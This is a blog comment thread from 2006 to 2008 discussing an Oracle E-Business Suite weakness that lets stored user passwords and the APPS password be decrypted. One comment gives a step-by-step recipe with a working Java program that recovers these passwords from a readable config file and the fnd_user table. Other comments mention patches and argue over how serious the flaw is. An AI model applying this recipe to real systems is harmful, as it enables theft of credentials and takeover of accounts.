Eddie Awad’s Blog - Latest Comments in Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Sofia — Fri, 08 Feb 2008 11:30:14 -0000

Hi braj
can you give a link of the final exxecutable that you mentioned?
Thank you

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

braj — Fri, 14 Dec 2007 04:21:30 -0000

Hi! Ewad,

If i am normal os user on system and have select any table privilege or select privilege on fnd_user table. I can easily break all the passwords even if i donot know the installation directory of oracle apps.

1. First step is to get guest user password

do the ps and try to find Ddbcfile
ps -eaf|grep Ddbcfile
from there you can get the FND_TOP location and DBCFILE location. The DBC file readable by all and there is plain text entry for guest user password.

2. Now you can easily set the classpath as you the APPL_TOP location and OAH_TOP location from ps command above
/usr/local/j2sdk1.4.2_15/jre/lib/rt.jar:/usr/local/j2sdk1.4.2_15/lib/dt.jar:/usr/local/j2sdk1.4.2_15/lib/tools.jar:/usr/local/j2sdk1.4.2_15/jre/lib/charsets.jar:/usr02/app/applebid/admin/ebid/java/appsborg2.zip::/usr02/app/applebid/product/8.0.6/forms60/java:/usr02/app/applebid/admin/ebid/java:/export/home/applebt1

3. Now write a simple Java code

public class GetPassword {
public static void main(String[] args) {

String appspassword=new String();
String guest_pwd=new String();
String userpass=new String();
String encrypted_foundation_passsword=new String();
String encrypted_passsword=new String();

guest_pwd="GUEST/ORACE"; /* fvalue got from dbc file */
encrypted_foundation_passsword="fafasfafafaf"; /* value got from fnd_user table for GUEST user */
encrypted_passsword="rfsfsfsafsfsfsf"; /* value got from fnd_user table for given user */
appspassword= oracle.apps.fnd.security.WebSessionManagerProc.decrypt(guest_pwd, encrypted_foundation_passsword);
userpass= oracle.apps.fnd.security.WebSessionManagerProc.decrypt(appspassword,encrypted_passsword);
System.out.println("user password:"+userpass);
System.out.println(" apps password:"+appspassword);
}

}

4. compile and run and you will get the user and apps password.

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Raimonds — Tue, 30 Oct 2007 18:47:44 -0000

I had a look on the new modified Java class oracle.apps.fnd.security.AolSecurity that this patch delivers.

As Oracle has written in the patch description now user passwords are stored in the following way:
1) at first SHA digest is made from user password
2) and then SHA digest is encrypted with APPS password and stored in encrypted_user_password column

When password verification is done then
1) encrypted_user_password is decrypted with APPS password
2) SHA1 of user password is compared with decrypted result

So it means that it will not be possible to find out all user passwords using APPS password as decryption key.

But as it seems to me if you will have SQL access to the database and if you will have at least one EBS login and password for this database then you will still be able to get APPS password.

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

bsieberth — Tue, 30 Oct 2007 14:03:51 -0000

It looks like there may be a fix for this vulnerability. Note: 457166.1 talks about a new option for FNDCPASS available in 11.5.10 RUP 6 and 12.0.4 to migrate user to a non-reversible hash password scheme. I haven't tried it yet to verify it, but it sounds like doing that will close off this vulnerability

-Brian

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Raimonds — Tue, 30 Oct 2007 13:52:07 -0000

Using Mehmet's Java source as an example I have created
Oracle E-Business Suite authentication plugin in Ruby. You can use this plugin for Ruby on Rails applications that want to use Oracle EBS users and passwords for authentication. Or you can use this as an example how to decrypt Oracle EBS user passwords in Ruby :)

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Nilesh — Mon, 17 Sep 2007 19:59:40 -0000

Mehmet,
How do you get the apps password through a user account? I have a need for a custom application, the users need to login using Oracle e-business password and then I need the apps database password to start the session just like Discoverer. Any pointers on this one, would greatly appreciate.

Thanks
Nilesh

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Eddie Awad — Mon, 23 Jul 2007 14:55:10 -0000

zokho, Here is the documentation for Data Encryption Using DBMS_OBFUSCATION_TOOLKIT in 9i.

You may also want to visit forums.oracle.com and ask your questions there. Usually, you will get a faster response there.

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

zokho — Wed, 18 Jul 2007 08:41:19 -0000

hello eddie
i have an oracle 9i and one of my assignment in university is that how to decrypt users' password in oracle so i ve read several guides related to topic and i found that i should have a table in my oracle which is named fnd_user!!!
is there any other approach to decrypt passwords in oracle 9i?
thank u
best regards

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Eddie Awad — Tue, 17 Jul 2007 23:26:21 -0000

Zokho, this is related to the Oracle E-Business Suite (EBS). If you do not have EBS, this does not apply to you.

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

zokho — Tue, 17 Jul 2007 07:17:32 -0000

hi again
im using oracle 9i.
i cant find any appsys schema in my oracle to have access to fnd_user and fnd_web_sec package!!
in which oracle version i can have have appsys schema???
or are there any table like fnd_user and package fnd_web_sec in oracle 9i?

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Eddie Awad — Mon, 16 Jul 2007 12:48:10 -0000

zokho, fnd_user is in applsys and fnd_web_sec is in apps.

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

zokho — Sun, 15 Jul 2007 16:11:41 -0000

hi.
in which schema in oracle i can find the fnd_user table?and FND_WEB_SEC package?

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Mehmet — Wed, 30 May 2007 14:52:14 -0000

Acctualt you dont need to know apps password to get users password. You can get all users password only knowing a user password.

For example with your ERP user you can get the apps password then you can get any user's password.

I've coded an application (at 2005) then use the javaclass and it gets apps password then login with this password just like Oracle Discoverer.
http://www.milci.com/eAppsV...

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Pete Dinin — Fri, 15 Dec 2006 14:53:29 -0000

I had raised this as an issue with Oracle well over a year ago. I was told that it was not a security issue, since it required significant amount of database access to exploit.

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

bsieberth — Fri, 15 Dec 2006 14:17:26 -0000

I was wondering how many people knew about this. The bigger issue to me is that if you know an application username / password and can read from the fnd_user table then you can find out the apps password.

Worse still using these techniques you can comprimise the apps password through a fairly unpriviledged account.

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Bilal Sarioz — Fri, 15 Dec 2006 09:06:18 -0000

We cannot say for this that is bug. In addition to this, secuirty itself is not only software way. While you're clonning the envrionments, you simply re-set the all passwords with a dummy password, you cleam all outputs.

This should be part of the secuirty.

But it was good to have such a code sample.
Thanks

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Eddie Awad — Wed, 13 Dec 2006 12:05:31 -0000

Since I have the APPS password on our development environment, I was able to change the FND_WEB_SEC package and run the query above. I now have the passwords for ALL the users on our development instance. These passwords happen to be the same in production, since our development instance is a clone of production.

So, simply, if you know passwords that you should not have known in the first place, I believe that this constitutes a security breach and can be categorized as a problem.

However, in this particular case, the APPS password holds the key to all other passwords. And the assumption is that whoever has the APPS password (and the associated privileges) is or should be a trusted person.

Re: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Mr. Ed — Tue, 12 Dec 2006 23:57:28 -0000

To be fair, the Java classes do have file permissions, so you would have to be a part of that OS group (or the OS user itself) in order to load them. So you've already had a breach in OS security at that point.

For the database side, you have to have access to the package, so that would already be a database security breach, like you said.

I'm not sure it's a security problem. It's unsettling, for sure, but is it a security problem?